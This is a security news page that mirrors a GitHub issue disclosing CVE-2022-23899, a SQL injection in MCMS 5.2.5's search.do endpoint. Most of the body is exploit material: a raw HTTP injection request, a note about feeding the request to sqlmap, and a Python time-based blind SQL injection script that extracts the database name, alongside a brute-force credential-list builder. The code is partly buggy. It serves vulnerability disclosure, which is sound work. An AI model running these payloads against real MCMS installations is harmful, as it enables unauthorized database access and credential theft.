Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-23899: MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI · Issue #63 · ming-soft/MCMS

MCMS v5.2.5 was discovered to contain a SQL injection vulnerability via search.do in the file /web/MCmsAction.java.

CVE
Open in Source
#sql#vulnerability#web#js#git#java

As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run
image

Look up for filed and find the incoming parameter
image

Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let’s move on to the next data chain
image
image

Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let’s move on to the next data chain
image
image

This block was found to have database calls
image

Next we try to inject, see the file net/mingsoft/cms/action/web/MCmsAction.java at the top of the class definition, you can know the route is host:port/mcms, and then add the method to be called, you can get the route is host:port/mcms/ search.do, next try to inject

GET /mcms/search.do?1'=0000 HTTP/1.1
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 315bc447-c977-4eb8-8b99-ae231e7a2b08
Host: localhost:8080
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=96B0978724C81C34A99F09541FA893D4

image

Next I wrote a py file for convenient validation, using delayed injection

"""
{0}:要查的东西
{1}:起始位置
{2}:长度
{3}:猜测的值
"""
host = "http://localhost:8080/mcms/search.do?'%2b(select+'123'+AND+if(ascii(substr({0},{1},{2}))%3d{3},sleep(2),2)),--+=000"

def a():
    with open("/Users/helu/penetration/bruteDicts/account/top500_username.txt", "r") as usernames:
        with open("/Users/helu/penetration/bruteDicts/account/pwdFast.txt", "r") as pwds:
            with open("/Users/helu/penetration/bruteDicts/account/admin_pwd.txt", "a+") as file:
                data1 = usernames.read().splitlines()
                data2 = pwds.read().splitlines()
                for username in data1:
                    for pwd in data2:
                        str = base64.encodebytes(("admin" + ":" + pwd).encode("utf-8"))

                        # str += "\n"
                        file.write(str.decode("utf-8"))

def timeout(url):
    try:
        rsp = requests.get(url, timeout=3)
        return rsp.text
    except Exception:
        return "timeout"


def guess_length(target):
    for i in range(1, 100):
        url = host.format(target,1,1,i)
        rsp = timeout(url)
        if "timeout" in rsp:
            print("库长:" + chr(i) )
            return int(chr(i))

def guess_char(tar,len):
    for i in range(0,len+1):
        for j in range(47, 123):
            url = host.format(tar,i,1,"'{0}'".format(j))
            rsp = timeout(url)
            if "timeout" in rsp:
                print(chr(j))

def b(tar):
    length = guess_length(tar)
    guess_char("database()",length)

b("length(database())")

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE